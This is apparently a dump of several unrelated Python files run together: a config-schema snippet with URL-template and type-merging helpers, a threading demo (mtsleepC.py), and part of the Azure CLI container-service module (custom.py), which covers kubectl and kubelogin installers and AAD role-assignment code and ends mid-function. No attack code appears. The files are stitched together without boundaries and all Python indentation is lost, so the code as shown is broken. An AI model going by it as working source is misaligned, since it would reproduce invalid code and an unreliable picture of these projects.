if isinstance(self.url, str):
url = self.url
skip: Set[str] = set()
else:
if not self.url.parse:
return set()
url = self.url.url
skip = self.url.skip
ret: Set[str] = set()
for match in re.finditer(r"\{(?P<param>.*?)\}", url):
param = match.group("param")
if param:
ret.add(param)
return ret - skip
def populate_url(self, params: Dict[str, str]) -> str:
if isinstance(self.url, str):
url = self.url
else:
url = self.url.url
if not self.url.parse:
return url
for key, value in params.items():
url = url.replace("{" + key + "}", value)
return url
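# Illustrative example for the two URL helpers above, using a made-up endpoint: with
# url = "https://api.example.com/{country}/cities/{id}", url_path_params() yields
# {"country", "id"}, and populate_url({"country": "us", "id": "42"}) renders
# "https://api.example.com/us/cities/42".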
class SchemaFieldDef(BaseDef):
target: str
type: str
description: Optional[str]
def merge(self, rhs: BaseDefT) -> BaseDefT:
if not isinstance(rhs, SchemaFieldDef):
raise ValueError(f"Cannot merge {type(self)} with {type(rhs)}")
if self.target != rhs.target:
raise ValueError("Cannot merge SchemaFieldDef with different target.")
merged_type = merge_type(self.type, rhs.type)
cur: SchemaFieldDef = self.copy() # type: ignore
cur.type = merged_type
cur.description = rhs.description
return cur # type: ignore
TYPE_TREE = {
"object": None,
"string": None,
"float": "string",
"int": "float",
"boolean": "string",
}
def merge_type(a: str, b: str) -> str: # pylint: disable=invalid-name
if a == b:
return a
aset = {a}
bset = {b}
    while True:
        aparent = TYPE_TREE[a]
        if aparent is not None:
            if aparent in bset:
                return aparent
            aset.add(aparent)
            a = aparent  # climb one level up a's branch
        bparent = TYPE_TREE[b]
        if bparent is not None:
            if bparent in aset:
                return bparent
            bset.add(bparent)
            b = bparent  # climb one level up b's branch
        if aparent is None and bparent is None:
            raise RuntimeError("Unreachable")
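# Worked example under the TYPE_TREE above: merge_type("int", "float") returns "float"
# (float is int's parent), and merge_type("int", "boolean") returns "string", the closest
# common ancestor of the two branches.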
class ResponseDef(BaseDef):
ctype: str = Field("application/json", const=True)
table_path: str
schema_: Dict[str, SchemaFieldDef] = Field(alias="schema")
orient: str = Field(regex=r"^(records|split)$")
class ConfigDef(BaseDef):
version: int = Field(1, const=True)
request: RequestDef
examples: Optional[Dict[str, str]]
response: ResponseDef
mtsleepC.py
#!/usr/bin/env python3
import threading
from time import sleep, ctime
loops = [4, 2]
def loop(nloop, nsec):
print('start loop', nloop, 'at:', ctime())
sleep(nsec)
print('loop', nloop, 'done at:', ctime())
def main():
print('starting at:', ctime())
threads = []
nloops = range(len(loops))
for i in nloops:
        # The key difference between instantiating Thread (calling Thread()) and calling
        # thread.start_new_thread() is that the new thread does not start running immediately
t = threading.Thread(target=loop, args=(i, loops[i]))
threads.append(t)
for i in nloops:
threads[i].start()
    # join() waits until a thread finishes, or, if a timeout is given, until the timeout
    # expires. Using join() is clearer than an endless loop that waits for a lock to be
    # released (which is why such a lock is also called a spinlock).
for i in nloops:
        # join() is only useful when you need to wait for a thread to finish
threads[i].join() # wait for all threads to finish
print('all DONE at:', ctime())
if __name__ == '__main__':
main()
custom.py
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
import colorama
import base64
import binascii
import datetime
import errno
import io
import json
import os
import os.path
import platform
import random
import re
import shutil
import ssl
import stat
import string
import subprocess
import sys
import tempfile
import threading
import time
import uuid
import webbrowser
import zipfile
from distutils.version import StrictVersion
from math import isnan
from six.moves.urllib.request import urlopen # pylint: disable=import-error
from six.moves.urllib.error import URLError # pylint: disable=import-error
# pylint: disable=import-error
import yaml
import dateutil.parser
from dateutil.relativedelta import relativedelta
from knack.log import get_logger
from knack.util import CLIError
from knack.prompting import prompt_pass, NoTTYException, prompt_y_n
from msrestazure.azure_exceptions import CloudError
import requests
# pylint: disable=no-name-in-module,import-error
from azure.cli.command_modules.acs import acs_client, proxy
from azure.cli.command_modules.acs._params import regions_in_preview, regions_in_prod
from azure.cli.core.api import get_config_dir
from azure.cli.core.azclierror import (ResourceNotFoundError,
ClientRequestError,
ArgumentUsageError,
InvalidArgumentValueError,
MutuallyExclusiveArgumentError,
ValidationError,
UnauthorizedError,
AzureInternalError,
FileOperationError)
from azure.cli.core._profile import Profile
from azure.cli.core.profiles import ResourceType
from azure.cli.core.commands.client_factory import get_mgmt_service_client, get_subscription_id
from azure.cli.core.keys import is_valid_ssh_rsa_public_key
from azure.cli.core.util import in_cloud_console, shell_safe_json_parse, truncate_text, sdk_no_wait
from azure.cli.core.commands import LongRunningOperation
from azure.graphrbac.models import (ApplicationCreateParameters,
ApplicationUpdateParameters,
PasswordCredential,
KeyCredential,
ServicePrincipalCreateParameters,
GetObjectsParameters,
ResourceAccess, RequiredResourceAccess)
from azure.mgmt.containerservice.models import ContainerServiceOrchestratorTypes
from ._client_factory import cf_container_services
from ._client_factory import cf_resource_groups
from ._client_factory import get_auth_management_client
from ._client_factory import get_graph_rbac_management_client
from ._client_factory import cf_resources
from ._client_factory import get_resource_by_name
from ._client_factory import cf_container_registry_service
from ._client_factory import cf_agent_pools
from ._client_factory import get_msi_client
from ._helpers import (_populate_api_server_access_profile, _set_vm_set_type, _set_outbound_type,
_parse_comma_separated_list)
from ._loadbalancer import (set_load_balancer_sku, is_load_balancer_profile_provided,
update_load_balancer_profile, create_load_balancer_profile)
from ._consts import CONST_SCALE_SET_PRIORITY_REGULAR, CONST_SCALE_SET_PRIORITY_SPOT, CONST_SPOT_EVICTION_POLICY_DELETE
from ._consts import CONST_HTTP_APPLICATION_ROUTING_ADDON_NAME
from ._consts import CONST_MONITORING_ADDON_NAME
from ._consts import CONST_MONITORING_LOG_ANALYTICS_WORKSPACE_RESOURCE_ID
from ._consts import CONST_VIRTUAL_NODE_ADDON_NAME
from ._consts import CONST_VIRTUAL_NODE_SUBNET_NAME
from ._consts import CONST_KUBE_DASHBOARD_ADDON_NAME
from ._consts import CONST_AZURE_POLICY_ADDON_NAME
from ._consts import CONST_INGRESS_APPGW_ADDON_NAME
from ._consts import CONST_INGRESS_APPGW_APPLICATION_GATEWAY_ID, CONST_INGRESS_APPGW_APPLICATION_GATEWAY_NAME
from ._consts import CONST_INGRESS_APPGW_SUBNET_CIDR, CONST_INGRESS_APPGW_SUBNET_ID
from ._consts import CONST_INGRESS_APPGW_WATCH_NAMESPACE
from ._consts import CONST_CONFCOM_ADDON_NAME, CONST_ACC_SGX_QUOTE_HELPER_ENABLED
from ._consts import ADDONS
from ._consts import CONST_CANIPULL_IMAGE
from ._consts import CONST_PRIVATE_DNS_ZONE_SYSTEM
from ._consts import CONST_MANAGED_IDENTITY_OPERATOR_ROLE, CONST_MANAGED_IDENTITY_OPERATOR_ROLE_ID
logger = get_logger(__name__)
# pylint:disable=too-many-lines,unused-argument
def which(binary):
path_var = os.getenv('PATH')
if platform.system() == 'Windows':
binary = binary + '.exe'
parts = path_var.split(';')
else:
parts = path_var.split(':')
for part in parts:
bin_path = os.path.join(part, binary)
if os.path.exists(bin_path) and os.path.isfile(bin_path) and os.access(bin_path, os.X_OK):
return bin_path
return None
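# Illustrative usage: which('kubectl') returns the full path of the kubectl binary if it is
# on PATH (with '.exe' appended on Windows), or None when it cannot be found.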
def get_cmd_test_hook_data(filename):
hook_data = None
curr_dir = os.path.dirname(os.path.realpath(__file__))
test_hook_file_path = os.path.join(curr_dir, 'tests/latest/data', filename)
if os.path.exists(test_hook_file_path):
with open(test_hook_file_path, "r") as f:
hook_data = json.load(f)
return hook_data
def wait_then_open(url):
"""
Waits for a bit then opens a URL. Useful for waiting for a proxy to come up, and then open the URL.
"""
    for _ in range(1, 10):
        try:
            urlopen(url, context=_ssl_context())
            break
        except URLError:
            time.sleep(1)
webbrowser.open_new_tab(url)
def wait_then_open_async(url):
"""
Spawns a thread that waits for a bit then opens a URL.
"""
    t = threading.Thread(target=wait_then_open, args=(url,))
t.daemon = True
t.start()
def acs_browse(cmd, client, resource_group_name, name, disable_browser=False, ssh_key_file=None):
"""
Opens a browser to the web interface for the cluster orchestrator
:param name: Name of the target Azure container service instance.
:type name: String
:param resource_group_name: Name of Azure container service's resource group.
:type resource_group_name: String
    :param disable_browser: If true, don't launch a web browser after establishing the proxy
:type disable_browser: bool
:param ssh_key_file: If set a path to an SSH key to use, only applies to DCOS
:type ssh_key_file: string
"""
acs_info = _get_acs_info(cmd.cli_ctx, name, resource_group_name)
_acs_browse_internal(
cmd, client, acs_info, resource_group_name, name, disable_browser, ssh_key_file)
def _acs_browse_internal(cmd, client, acs_info, resource_group_name, name, disable_browser, ssh_key_file):
orchestrator_type = acs_info.orchestrator_profile.orchestrator_type # pylint: disable=no-member
if str(orchestrator_type).lower() == 'kubernetes' or \
orchestrator_type == ContainerServiceOrchestratorTypes.kubernetes or \
(acs_info.custom_profile and acs_info.custom_profile.orchestrator == 'kubernetes'): # pylint: disable=no-member
return k8s_browse(cmd, client, name, resource_group_name, disable_browser, ssh_key_file=ssh_key_file)
if str(orchestrator_type).lower() == 'dcos' or orchestrator_type == ContainerServiceOrchestratorTypes.dcos:
return _dcos_browse_internal(acs_info, disable_browser, ssh_key_file)
raise CLIError(
'Unsupported orchestrator type {} for browse'.format(orchestrator_type))
def k8s_browse(cmd, client, name, resource_group_name, disable_browser=False, ssh_key_file=None):
"""
Launch a proxy and browse the Kubernetes web UI.
    :param disable_browser: If true, don't launch a web browser after establishing the proxy
:type disable_browser: bool
"""
acs_info = _get_acs_info(cmd.cli_ctx, name, resource_group_name)
_k8s_browse_internal(name, acs_info, disable_browser, ssh_key_file)
def _k8s_browse_internal(name, acs_info, disable_browser, ssh_key_file):
if not which('kubectl'):
raise CLIError('Can not find kubectl executable in PATH')
browse_path = os.path.join(get_config_dir(), 'acsBrowseConfig.yaml')
if os.path.exists(browse_path):
os.remove(browse_path)
_k8s_get_credentials_internal(
name, acs_info, browse_path, ssh_key_file, False)
logger.warning('Proxy running on 127.0.0.1:8001/ui')
logger.warning('Press CTRL+C to close the tunnel...')
if not disable_browser:
wait_then_open_async('http://127.0.0.1:8001/ui')
subprocess.call(["kubectl", "--kubeconfig", browse_path, "proxy"])
def dcos_browse(cmd, client, name, resource_group_name, disable_browser=False, ssh_key_file=None):
"""
Creates an SSH tunnel to the Azure container service, and opens the Mesosphere DC/OS dashboard in the browser.
    :param name: Name of the target Azure container service instance.
:type name: String
:param resource_group_name: Name of Azure container service's resource group.
:type resource_group_name: String
    :param disable_browser: If true, don't launch a web browser after establishing the proxy
:type disable_browser: bool
:param ssh_key_file: Path to the SSH key to use
:type ssh_key_file: string
"""
acs_info = _get_acs_info(cmd.cli_ctx, name, resource_group_name)
_dcos_browse_internal(acs_info, disable_browser, ssh_key_file)
def _dcos_browse_internal(acs_info, disable_browser, ssh_key_file):
if not os.path.isfile(ssh_key_file):
raise CLIError(
'Private key file {} does not exist'.format(ssh_key_file))
acs = acs_client.ACSClient()
if not acs.connect(_get_host_name(acs_info), _get_username(acs_info),
key_filename=ssh_key_file):
raise CLIError('Error connecting to ACS: {}'.format(
_get_host_name(acs_info)))
octarine_bin = '/opt/mesosphere/bin/octarine'
if not acs.file_exists(octarine_bin):
raise CLIError(
'Proxy server ({}) does not exist on the cluster.'.format(octarine_bin))
proxy_id = _rand_str(16)
proxy_cmd = '{} {}'.format(octarine_bin, proxy_id)
acs.run(proxy_cmd, background=True)
# Parse the output to get the remote PORT
proxy_client_cmd = '{} --client --port {}'.format(octarine_bin, proxy_id)
stdout, _ = acs.run(proxy_client_cmd)
remote_port = int(stdout.read().decode().strip())
local_port = acs.get_available_local_port()
# Set the proxy
proxy.set_http_proxy('127.0.0.1', local_port)
logger.warning('Proxy running on 127.0.0.1:%s', local_port)
logger.warning('Press CTRL+C to close the tunnel...')
if not disable_browser:
wait_then_open_async('http://127.0.0.1')
try:
acs.create_tunnel(
remote_host='127.0.0.1',
remote_port=remote_port,
local_port=local_port)
finally:
proxy.disable_http_proxy()
def acs_install_cli(cmd, client, resource_group_name, name, install_location=None, client_version=None):
acs_info = _get_acs_info(cmd.cli_ctx, name, resource_group_name)
orchestrator_type = acs_info.orchestrator_profile.orchestrator_type # pylint: disable=no-member
kwargs = {'install_location': install_location}
if client_version:
kwargs['client_version'] = client_version
if orchestrator_type == 'kubernetes':
return k8s_install_cli(**kwargs)
if orchestrator_type == 'dcos':
return dcos_install_cli(**kwargs)
raise CLIError(
'Unsupported orchestrator type {} for install-cli'.format(orchestrator_type))
def _ssl_context():
if sys.version_info < (3, 4) or (in_cloud_console() and platform.system() == 'Windows'):
try:
# added in python 2.7.13 and 3.6
return ssl.SSLContext(ssl.PROTOCOL_TLS)
except AttributeError:
return ssl.SSLContext(ssl.PROTOCOL_TLSv1)
return ssl.create_default_context()
def _urlretrieve(url, filename):
req = urlopen(url, context=_ssl_context())
with open(filename, "wb") as f:
f.write(req.read())
def _unzip(src, dest):
logger.debug('Extracting %s to %s.', src, dest)
system = platform.system()
if system in ('Linux', 'Darwin', 'Windows'):
with zipfile.ZipFile(src, 'r') as zipObj:
zipObj.extractall(dest)
else:
raise CLIError('The current system is not supported.')
def dcos_install_cli(cmd, install_location=None, client_version='1.8'):
"""
Downloads the dcos command line from Mesosphere
"""
system = platform.system()
if not install_location:
raise CLIError(
"No install location specified and it could not be determined from the current platform '{}'".format(
system))
base_url = 'https://downloads.dcos.io/binaries/cli/{}/x86-64/dcos-{}/{}'
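    # e.g. base_url.format('linux', '1.8', 'dcos') yields
    # 'https://downloads.dcos.io/binaries/cli/linux/x86-64/dcos-1.8/dcos'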
if system == 'Windows':
file_url = base_url.format('windows', client_version, 'dcos.exe')
elif system == 'Linux':
# TODO Support ARM CPU here
file_url = base_url.format('linux', client_version, 'dcos')
elif system == 'Darwin':
file_url = base_url.format('darwin', client_version, 'dcos')
else:
        raise CLIError(
            "Unsupported platform '{}' for the dcos client download.".format(system))
logger.warning('Downloading client to %s', install_location)
try:
_urlretrieve(file_url, install_location)
os.chmod(install_location,
os.stat(install_location).st_mode | stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH)
except IOError as err:
raise CLIError(
'Connection error while attempting to download client ({})'.format(err))
def k8s_install_cli(cmd, client_version='latest', install_location=None, base_src_url=None,
kubelogin_version='latest', kubelogin_install_location=None,
kubelogin_base_src_url=None):
k8s_install_kubectl(cmd, client_version, install_location, base_src_url)
k8s_install_kubelogin(cmd, kubelogin_version,
kubelogin_install_location, kubelogin_base_src_url)
def k8s_install_kubectl(cmd, client_version='latest', install_location=None, source_url=None):
"""
Install kubectl, a command-line interface for Kubernetes clusters.
"""
if not source_url:
source_url = "https://storage.googleapis.com/kubernetes-release/release"
cloud_name = cmd.cli_ctx.cloud.name
if cloud_name.lower() == 'azurechinacloud':
source_url = 'https://mirror.azure.cn/kubernetes/kubectl'
if client_version == 'latest':
context = _ssl_context()
version = urlopen(source_url + '/stable.txt', context=context).read()
client_version = version.decode('UTF-8').strip()
else:
client_version = "v%s" % client_version
file_url = ''
system = platform.system()
base_url = source_url + '/{}/bin/{}/amd64/{}'
# ensure installation directory exists
install_dir, cli = os.path.dirname(
install_location), os.path.basename(install_location)
if not os.path.exists(install_dir):
os.makedirs(install_dir)
if system == 'Windows':
file_url = base_url.format(client_version, 'windows', 'kubectl.exe')
elif system == 'Linux':
# TODO: Support ARM CPU here
file_url = base_url.format(client_version, 'linux', 'kubectl')
elif system == 'Darwin':
file_url = base_url.format(client_version, 'darwin', 'kubectl')
else:
        raise CLIError(
            "Unsupported platform '{}' for the kubectl download.".format(system))
logger.warning('Downloading client to "%s" from "%s"',
install_location, file_url)
try:
_urlretrieve(file_url, install_location)
os.chmod(install_location,
os.stat(install_location).st_mode | stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH)
except IOError as ex:
raise CLIError(
'Connection error while attempting to download client ({})'.format(ex))
if system == 'Windows': # be verbose, as the install_location likely not in Windows's search PATHs
env_paths = os.environ['PATH'].split(';')
found = next((x for x in env_paths if x.lower().rstrip(
'\\') == install_dir.lower()), None)
if not found:
# pylint: disable=logging-format-interpolation
logger.warning('Please add "{0}" to your search PATH so the `{1}` can be found. 2 options: \n'
' 1. Run "set PATH=%PATH%;{0}" or "$env:path += \'{0}\'" for PowerShell. '
'This is good for the current command session.\n'
' 2. Update system PATH environment variable by following '
'"Control Panel->System->Advanced->Environment Variables", and re-open the command window. '
'You only need to do it once'.format(install_dir, cli))
else:
logger.warning('Please ensure that %s is in your search PATH, so the `%s` command can be found.',
install_dir, cli)
def k8s_install_kubelogin(cmd, client_version='latest', install_location=None, source_url=None):
"""
Install kubelogin, a client-go credential (exec) plugin implementing azure authentication.
"""
cloud_name = cmd.cli_ctx.cloud.name
if not source_url:
source_url = 'https://github.com/Azure/kubelogin/releases/download'
if cloud_name.lower() == 'azurechinacloud':
source_url = 'https://mirror.azure.cn/kubernetes/kubelogin'
if client_version == 'latest':
context = _ssl_context()
latest_release_url = 'https://api.github.com/repos/Azure/kubelogin/releases/latest'
if cloud_name.lower() == 'azurechinacloud':
latest_release_url = 'https://mirror.azure.cn/kubernetes/kubelogin/latest'
latest_release = urlopen(latest_release_url, context=context).read()
client_version = json.loads(latest_release)['tag_name'].strip()
else:
client_version = "v%s" % client_version
base_url = source_url + '/{}/kubelogin.zip'
file_url = base_url.format(client_version)
# ensure installation directory exists
install_dir, cli = os.path.dirname(
install_location), os.path.basename(install_location)
if not os.path.exists(install_dir):
os.makedirs(install_dir)
system = platform.system()
if system == 'Windows':
sub_dir, binary_name = 'windows_amd64', 'kubelogin.exe'
elif system == 'Linux':
# TODO: Support ARM CPU here
sub_dir, binary_name = 'linux_amd64', 'kubelogin'
elif system == 'Darwin':
if platform.machine() == 'arm64':
sub_dir, binary_name = 'darwin_arm64', 'kubelogin'
else:
sub_dir, binary_name = 'darwin_amd64', 'kubelogin'
    else:
        raise CLIError(
            'Unsupported system "{}". kubelogin can only be installed on Windows, Linux or Darwin (macOS).'.format(system))
with tempfile.TemporaryDirectory() as tmp_dir:
try:
download_path = os.path.join(tmp_dir, 'kubelogin.zip')
logger.warning('Downloading client to "%s" from "%s"',
download_path, file_url)
_urlretrieve(file_url, download_path)
except IOError as ex:
raise CLIError(
'Connection error while attempting to download client ({})'.format(ex))
_unzip(download_path, tmp_dir)
download_path = os.path.join(tmp_dir, 'bin', sub_dir, binary_name)
shutil.move(download_path, install_location)
os.chmod(install_location, os.stat(install_location).st_mode |
stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH)
    if system == 'Windows':  # be verbose, as install_location is likely not in the Windows search PATH
env_paths = os.environ['PATH'].split(';')
found = next((x for x in env_paths if x.lower().rstrip(
'\\') == install_dir.lower()), None)
if not found:
# pylint: disable=logging-format-interpolation
            logger.warning('Please add "{0}" to your search PATH so the `{1}` command can be found. There are 2 options: \n'
' 1. Run "set PATH=%PATH%;{0}" or "$env:path += \'{0}\'" for PowerShell. '
'This is good for the current command session.\n'
' 2. Update system PATH environment variable by following '
'"Control Panel->System->Advanced->Environment Variables", and re-open the command window. '
                           'You only need to do it once.'.format(install_dir, cli))
else:
logger.warning('Please ensure that %s is in your search PATH, so the `%s` command can be found.',
install_dir, cli)
def _build_service_principal(rbac_client, cli_ctx, name, url, client_secret):
# use get_progress_controller
hook = cli_ctx.get_progress_controller(True)
    hook.add(message='Creating service principal', value=0, total_val=1.0)
logger.info('Creating service principal')
# always create application with 5 years expiration
start_date = datetime.datetime.utcnow()
end_date = start_date + relativedelta(years=5)
result, aad_session_key = create_application(rbac_client.applications, name, url, [url], password=client_secret,
start_date=start_date, end_date=end_date)
service_principal = result.app_id # pylint: disable=no-member
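    # the new application may not have replicated through AAD yet, so retry service principal creation with an increasing backoff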
for x in range(0, 10):
hook.add(message='Creating service principal',
value=0.1 * x, total_val=1.0)
try:
create_service_principal(
cli_ctx, service_principal, rbac_client=rbac_client)
break
# TODO figure out what exception AAD throws here sometimes.
except Exception as ex: # pylint: disable=broad-except
logger.info(ex)
time.sleep(2 + 2 * x)
else:
return False, aad_session_key
hook.add(message='Finished service principal creation',
value=1.0, total_val=1.0)
logger.info('Finished service principal creation')
return service_principal, aad_session_key
def _add_role_assignment(cmd, role, service_principal_msi_id, is_service_principal=True, delay=2, scope=None):
# AAD can have delays in propagating data, so sleep and retry
hook = cmd.cli_ctx.get_progress_controller(True)
hook.add(message='Waiting for AAD role to propagate',
value=0, total_val=1.0)
logger.info('Waiting for AAD role to propagate')
for x in range(0, 10):
hook.add(message='Waiting for AAD role to propagate',
value=0.1 * x, total_val=1.0)
try:
# TODO: break this out into a shared utility library
create_role_assignment(
cmd, role, service_principal_msi_id, is_service_principal, scope=scope)
break
except CloudError as ex:
if ex.message == 'The role assignment already exists.':
break
logger.info(ex.message)
except: # pylint: disable=bare-except
pass
time.sleep(delay + delay * x)
else:
return False
hook.add(message='AAD role propagation done', value=1.0, total_val=1.0)
logger.info('AAD role propagation done')
return True
def delete_role_assignments(cli_ctx, ids=None, assignee=None, role=None, resource_group_name=None,
scope=None, include_inherited=False, yes=None):
factory = get_auth_management_client(cli_ctx, scope)
assignments_client = factory.role_assignments
definitions_client = factory.role_definitions
ids = ids or []
if ids:
if assignee or role or resource_group_name or scope or include_inherited:
raise CLIError(
'When assignment ids are used, other parameter values are not required')
for i in ids:
assignments_client.delete_by_id(i)
return
    if not any([ids, assignee, role, resource_group_name, scope, yes]):
msg = 'This will delete all role assignments under the subscription. Are you sure?'
if not prompt_y_n(msg, default="n"):
return
scope = _build_role_scope(resource_group_name, scope,
assignments_client.config.subscription_id)
assignments = _search_role_assignments(cli_ctx, assignments_client, definitions_client,
scope, assignee, role, include_inherited,
include_groups=False)
if assignments:
for a in assignments:
assignments_client.delete_by_id(a.id)
def _delete_role_assignments(cli_ctx, role, service_principal, delay=2, scope=None):
# AAD can have delays in propagating data, so sleep and retry
hook = cli_ctx.get_progress_controller(True)
hook.add(message='Waiting for AAD role to delete', value=0, total_val=1.0)
logger.info('Waiting for AAD role to delete')
for x in range(0, 10):
hook.add(message='Waiting for AAD role to delete',
value=0.1 * x, total_val=1.0)
try:
delete_role_assignments(cli_ctx,
role=role,
assignee=service_principal,
scope=scope)
break
except CLIError as ex:
raise ex
except CloudError as ex:
logger.info(ex)
time.sleep(delay + delay * x)
else:
return False
hook.add(message='AAD role deletion done', value=1.0, total_val=1.0)
logger.info('AAD role deletion done')
return True
def _search_role_assignments(cli_ctx, assignments_client, definitions_client,
scope, assignee, role, include_inherited, include_groups):
assignee_object_id = None
if assignee:
assignee_object_id = _resolve_object_id(cli_ctx, assignee)
# always use "scope" if provided, so we can get assignments beyond subscription e.g. management groups
if scope:
assignments = list(assignments_client.list_for_scope(
scope=scope, filter='atScope()'))
elif assignee_object_id:
if include_groups:
f = "assignedTo('{}')".format(assignee_object_id)
else:
f = "principalId eq '{}'".format(assignee_object_id)
assignments = list(assignments_client.list(filter=f))
else:
assignments = list(assignments_client.list())
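    # narrow results to the requested scope; with include_inherited, assignments made at parent scopes
    # (whose scope prefixes the requested one) are kept as well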
if assignments:
assignments = [a for a in assignments if (
not scope or
include_inherited and re.match(_get_role_property(a, 'scope'), scope, re.I) or
_get_role_property(a, 'scope').lower() == scope.lower()
)]
if role:
role_id = _resolve_role_id(role, scope, definitions_client)
assignments = [i for i in assignments if _get_role_property(
i, 'role_definition_id') == role_id]
if assignee_object_id:
assignments = [i for i in assignments if _get_role_property(
i, 'principal_id') == assignee_object_id]
return assignments
def _get_role_property(obj, property_name):
if isinstance(obj, dict):
return obj[property_name]
return getattr(obj, property_name)
def _get_default_dns_prefix(name, resource_group_name, subscription_id):
# Use subscription id to provide uniqueness and prevent DNS name clashes
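    # resulting prefix: <name[:10]>-<resource_group[:16]>-<subscription_id[:6]>, stripped to alphanumerics/dashes with a leading letter enforced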
    name_part = re.sub('[^A-Za-z0-9-]', '', name)[0:10]
    if not name_part or not name_part[0].isalpha():
        name_part = ('a' + name_part)[0:10]
resource_group_part = re.sub(
'[^A-Za-z0-9-]', '', resource_group_name)[0:16]
return '{}-{}-{}'.format(name_part, resource_group_part, subscription_id[0:6])
def list_acs_locations(cmd, client):
return {
"productionRegions": regions_in_prod,
"previewRegions": regions_in_preview
}
def _generate_windows_profile(windows, admin_username, admin_password):
if windows:
if not admin_password:
raise CLIError('--admin-password is required.')
if len(admin_password) < 6:
raise CLIError('--admin-password must be at least 6 characters')
windows_profile = {
"adminUsername": admin_username,
"adminPassword": admin_password,
}
return windows_profile
return None
def _generate_master_pool_profile(api_version, master_profile, master_count, dns_name_prefix,
master_vm_size, master_osdisk_size, master_vnet_subnet_id,
master_first_consecutive_static_ip, master_storage_profile):
master_pool_profile = {}
default_master_pool_profile = {
"count": int(master_count),
"dnsPrefix": dns_name_prefix + 'mgmt',
}
if api_version == "2017-07-01":
default_master_pool_profile = _update_dict(default_master_pool_profile, {
"count": int(master_count),
"dnsPrefix": dns_name_prefix + 'mgmt',
"vmSize": master_vm_size,
"osDiskSizeGB": int(master_osdisk_size),
"vnetSubnetID": master_vnet_subnet_id,
"firstConsecutiveStaticIP": master_first_consecutive_static_ip,
"storageProfile": master_storage_profile,
})
if not master_profile:
master_pool_profile = default_master_pool_profile
else:
master_pool_profile = _update_dict(
default_master_pool_profile, master_profile)
return master_pool_profile
def _generate_agent_pool_profiles(api_version, agent_profiles, agent_count, dns_name_prefix,
agent_vm_size, os_type, agent_osdisk_size, agent_vnet_subnet_id,
agent_ports, agent_storage_profile):
agent_pool_profiles = []
default_agent_pool_profile = {
"count": int(agent_count),
"vmSize": agent_vm_size,
"osType": os_type,
"dnsPrefix": dns_name_prefix + 'agent',
}
if api_version == "2017-07-01":
default_agent_pool_profile = _update_dict(default_agent_pool_profile, {
"count": int(agent_count),
"vmSize": agent_vm_size,
"osDiskSizeGB": int(agent_osdisk_size),
"osType": os_type,
"dnsPrefix": dns_name_prefix + 'agent',
"vnetSubnetID": agent_vnet_subnet_id,
"ports": agent_ports,
"storageProfile": agent_storage_profile,
})
if agent_profiles is None:
agent_pool_profiles.append(_update_dict(
default_agent_pool_profile, {"name": "agentpool0"}))
else:
# override agentPoolProfiles by using the passed in agent_profiles
for idx, ap in enumerate(agent_profiles):
# if the user specified dnsPrefix, we honor that
# otherwise, we use the idx to avoid duplicate dns name
a = _update_dict(
{"dnsPrefix": dns_name_prefix + 'agent' + str(idx)}, ap)
agent_pool_profiles.append(
_update_dict(default_agent_pool_profile, a))
return agent_pool_profiles
def _generate_outputs(name, orchestrator_type, admin_username):
# define outputs
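    # each output value is an ARM template expression; reference() resolves the container service's FQDNs at deployment time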
outputs = {
"masterFQDN": {
"type": "string",
"value": "[reference(concat('Microsoft.ContainerService/containerServices/', '{}')).masterProfile.fqdn]".format(name) # pylint: disable=line-too-long
},
"sshMaster0": {
"type": "string",
"value": "[concat('ssh ', '{0}', '@', reference(concat('Microsoft.ContainerService/containerServices/', '{1}')).masterProfile.fqdn, ' -A -p 22')]".format(admin_username, name) # pylint: disable=line-too-long
},
}
if orchestrator_type.lower() != "kubernetes":
outputs["agentFQDN"] = {
"type": "string",
"value": "[reference(concat('Microsoft.ContainerService/containerServices/', '{}')).agentPoolProfiles[0].fqdn]".format(name) # pylint: disable=line-too-long
}
# override sshMaster0 for non-kubernetes scenarios
outputs["sshMaster0"] = {
"type": "string",
"value": "[concat('ssh ', '{0}', '@', reference(concat('Microsoft.ContainerService/containerServices/', '{1}')).masterProfile.fqdn, ' -A -p 2200')]".format(admin_username, name) # pylint: disable=line-too-long
}
return outputs
def _generate_properties(api_version, orchestrator_type, orchestrator_version, master_pool_profile,
agent_pool_profiles, ssh_key_value, admin_username, windows_profile):
properties = {
"orchestratorProfile": {
"orchestratorType": orchestrator_type,
},
"masterProfile": master_pool_profile,
"agentPoolProfiles": agent_pool_profiles,
"linuxProfile": {
"ssh": {
"publicKeys": [
{
"keyData": ssh_key_value
}
]
},
"adminUsername": admin_username
},
}
if api_version == "2017-07-01":
properties["orchestratorProfile"]["orchestratorVersion"] = orchestrator_version
if windows_profile is not None:
properties["windowsProfile"] = windows_profile
return properties
def _get_user_assigned_identity_resource_id_regular_expression():
return re.compile(
r'/subscriptions/(.*?)/resourcegroups/(.*?)/providers/microsoft.managedidentity/userassignedidentities/(.*)',
flags=re.IGNORECASE)
def _get_user_assigned_identity(cli_ctx, resource_id):
resource_id = resource_id.lower()
_re_user_assigned_identity_resource_id = _get_user_assigned_identity_resource_id_regular_expression()
match = _re_user_assigned_identity_resource_id.search(resource_id)
if match:
subscription_id = match.group(1)
resource_group_name = match.group(2)
identity_name = match.group(3)
msi_client = get_msi_client(cli_ctx, subscription_id)
try:
identity = msi_client.user_assigned_identities.get(resource_group_name=resource_group_name,
resource_name=identity_name)
except CloudError as ex:
if 'was not found' in ex.message:
raise ResourceNotFoundError("Identity {} not found.".format(resource_id))
raise ClientRequestError(ex.message)
return identity
raise InvalidArgumentValueError(
"Cannot parse identity name from provided resource id {}.".format(resource_id))
def _get_user_assigned_identity_client_id(cli_ctx, resource_id):
return _get_user_assigned_identity(cli_ctx, resource_id).client_id
def _get_user_assigned_identity_object_id(cli_ctx, resource_id):
return _get_user_assigned_identity(cli_ctx, resource_id).principal_id
# pylint: disable=too-many-locals
def acs_create(cmd, client, resource_group_name, deployment_name, name, ssh_key_value, dns_name_prefix=None,
location=None, admin_username="azureuser", api_version=None, master_profile=None,
master_vm_size="Standard_D2_v2", master_osdisk_size=0, master_count=1, master_vnet_subnet_id="",
master_first_consecutive_static_ip="10.240.255.5", master_storage_profile="",
agent_profiles=None, agent_vm_size="Standard_D2_v2", agent_osdisk_size=0,
agent_count=3, agent_vnet_subnet_id="", agent_ports=None, agent_storage_profile="",
orchestrator_type="DCOS", orchestrator_version="", service_principal=None, client_secret=None, tags=None,
